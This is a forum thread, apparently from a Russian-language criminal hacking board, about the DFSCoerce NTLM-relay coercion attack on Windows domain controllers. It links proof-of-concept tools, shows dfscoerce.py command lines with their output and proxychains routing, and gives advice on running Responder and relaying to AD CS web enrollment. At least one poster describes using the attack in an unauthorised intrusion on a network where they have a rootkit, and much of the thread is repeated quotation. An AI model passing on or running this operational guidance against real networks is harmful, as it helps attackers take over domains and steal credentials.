Remote DFSCoerce - новая атака на Windows-домен

[Nomak]

Новая форма атаки на NTLM-ретранслятор Windows использует распределённую систему файлов MS-DFSNM для получения контроля над доменом. ссылка на PoC

https://github.com/Wh04m1001/DFSCoerce

 

[rwanda]

Yea this is really nice, i tested yesterday in a place where Linux was initial compromise and worked.
Wonder if first box compromised is Windows, we could achieve same results with Inveigh (Its like Responder but for Windows) or some other tool that does same job.

 

[Pirone]

Хорошая уязвимость, работает по принципу petitpotam

 

[Wolverine]

Хорошая уязвимость, работает по принципу petitpotam

Он и взят за основу. А так нужен хоть какой то юзер для эксплуатации

 

[C0rtex]

а кроме брутфорса, интересно есть метод еще какой нибудь авторизации, с помощью ntlmv2-ssp, через тот же impacket

 

[Wolverine]

а кроме брутфорса, интересно есть метод еще какой нибудь авторизации, с помощью ntlmv2-ssp, через тот же impacket

Брутфорс и релей только вроде

 

[wav]

Что то не совсем понятна бага
выполнил, получил.

dfscoerce.py -u naiv -p !!pass@123 192.168.1.100 192.168.0.2
[-] Connecting to ncacn_np:192.168.0.2[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName:                      '192.168.1.100\x00'
RootShare:                       'test\x00'
ApiFlags:                        1


DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

192.168.1.100 мой айпи.
Подсобите в ЛС.

 

[developer_ing]

Что то не совсем понятна бага
выполнил, получил.

dfscoerce.py -u naiv -p !!pass@123 192.168.1.100 192.168.0.2
[-] Connecting to ncacn_np:192.168.0.2[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName:                      '192.168.1.100\x00'
RootShare:                       'test\x00'
ApiFlags:                        1


DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

192.168.1.100 мой айпи.
Подсобите в ЛС.

Можно и не в ЛС, а прям сюда, такая же проблема

 

[rwanda]

Update.
Hey yall, i was hacking some network and i got success reproducing this via proxychains inside a network.
I used responder from SpiderLabs (old responder) in a box inside the network where I have root.
I opened a socks inside this webserver and tried coercing on my responder.

In the linux box inside where i have rootkit, i executed Responder and then ran the command from the image above.
The result is this:

And it worked

 

[rwanda]

Update.
Hey yall, i was hacking some network and i got success reproducing this via proxychains inside a network.
I used responder from SpiderLabs (old responder) in a box inside the network where I have root.
I opened a socks inside this webserver and tried coercing on my responder.

Посмотреть вложение 38944
In the linux box inside where i have rootkit, i executed Responder and then ran the command from the image above.
The result is this:
Посмотреть вложение 38945
And it worked

Not sure If can be abused via ntlmrelayx.py to get a SOCKS as DC machine account.
I will keep digging and see if this is possible, my scenario is kinda limited because I dont have impacket installed in the linux target box.

 

[Desconocido]

вот еще A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
https://github.com/p0dalirius/Coercer
но почему то не стучит в респондер...

 

[rwanda]

вот еще A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
https://github.com/p0dalirius/Coercer
но почему то не стучит в респондер...

Nice tool.
To abuse this shit properly, by what i've read and understood so far we have to neither downgrade hashes to ntlmv1 or use some thing like CA Enrollment abuse to get a more straightforward domain admin hash ushing this techniques, but still very handy.

 

[Desconocido]

Update.
Hey yall, i was hacking some network and i got success reproducing this via proxychains inside a network.
I used responder from SpiderLabs (old responder) in a box inside the network where I have root.
I opened a socks inside this webserver and tried coercing on my responder.

Посмотреть вложение 38944
In the linux box inside where i have rootkit, i executed Responder and then ran the command from the image above.
The result is this:
Посмотреть вложение 38945
And it worked

proxychains not working for me on kali linux

proxychains python dfscoerce.py -d 'domain' -u 'user' -p 'pass' 172.20.xx.xx 192.168.0.xx
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[-] Connecting to ncacn_np:192.168.0.xx[\PIPE\netdfs]
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 127.0.0.1:9050 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.0.xx:445 <--denied
Something went wrong, check error status => [Errno Connection error (192.168.0.xx:445)] [Errno 111] Connection refused

 

[rwanda]

proxychains not working for me on kali linux

proxychains python dfscoerce.py -d 'domain' -u 'user' -p 'pass' 172.20.xx.xx 192.168.0.xx
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[-] Connecting to ncacn_np:192.168.0.xx[\PIPE\netdfs]
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 127.0.0.1:9050 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:9050 ... 192.168.0.xx:445 <--denied
Something went wrong, check error status => [Errno Connection error (192.168.0.xx:445)] [Errno 111] Connection refused

You need to first run Responder or something similiar in a linux server inside the same network.
Port 445 needs to be on listening mode in the box inside the network, so in other words you'll must have Responder running in the 172.20.x.x server for this coercion works.

 

[wav]

с таким хешем через impacket не законектиться, нужен брут ?

 

[rwanda]

с таким хешем через impacket не законектиться, нужен брут ?

да.

 

[tester0]

И что делать с этим машинным хэшем, сбрутить реально?

 

[isucukbx]

И что делать с этим машинным хэшем, сбрутить реально?

Нет, не реально.Просто тут в теме собрались гении которые собрались брутить 120(или сколько там) значный случайный пароль машинной учетки.
Удачи пацанам, чё сказать.

А еще, можно вопрос?Почему ты берешь доступы в отработку и не знаешь про ntlm релей?

Актуально, умею всё что умеет большенсвто пентестеров и может чуть больше.

Хотя тут примерно все такие, такое ощущение...

И тут дело не в том что я какой-то умный тк это вообще не так, я не уверен что смог бы пройти интервью на джуна в белую контору
Но здесь челы которые несколько лет занимаются темой и спрашивают "можно ли сделать PtH с ntlm-ssp хешем?".Пиздец.
Вам самим не стыдно?В чем проблема почитать немного, посмотреть какие-нибудь курсы?Все слито, все бесплатно..

 

[tester0]

Нет, не реально.Просто тут в теме собрались гении которые собрались брутить 120(или сколько там) значный случайный пароль машинной учетки.
Удачи пацанам, чё сказать.

А еще, можно вопрос?Почему ты берешь доступы в отработку и не знаешь про ntlm релей?

Хотя тут примерно все такие, такое ощущение...

И тут дело не в том что я какой-то умный тк это вообще не так, я не уверен что смог бы пройти интервью на джуна в белую контору
Но здесь челы которые несколько лет занимаются темой и спрашивают "можно ли сделать PtH с ntlm-ssp хешем?".Пиздец.
Вам самим не стыдно?В чем проблема почитать немного, посмотреть какие-нибудь курсы?Все слито, все бесплатно..

А ты много кого знаешь кто вобще ntlm-relay делал из пентестеров? Я вот одного только знаю из всех. ntlm-relay я делал но по другим параметрам и не мышинным аккаунтом. Тут просто нескольок человек отписали что брутить надо , вот я и уточнил - вдруг чего-то не знаю. Так что не надо тут ля-ля.

 

[IIIIXX]

А ты много кого знаешь кто вобще ntlm-relay делал из пентестеров? Я вот одного только знаю из всех. ntlm-relay я делал но по другим параметрам и не мышинным аккаунтом. Тут просто нескольок человек отписали что брутить надо , вот я и уточнил - вдруг чего-то не знаю. Так что не надо тут ля-ля.

Если на adcs включен web enroll, то реле делается без проблем и довольно тривиально
На дк смб подпись уже повсюду включена давным давно.
Сбрутить машинный хеш невозможно.